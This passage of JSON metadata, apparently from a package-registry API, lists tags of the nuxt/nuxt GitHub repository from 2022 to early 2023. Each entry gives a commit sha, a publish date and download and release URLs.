_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui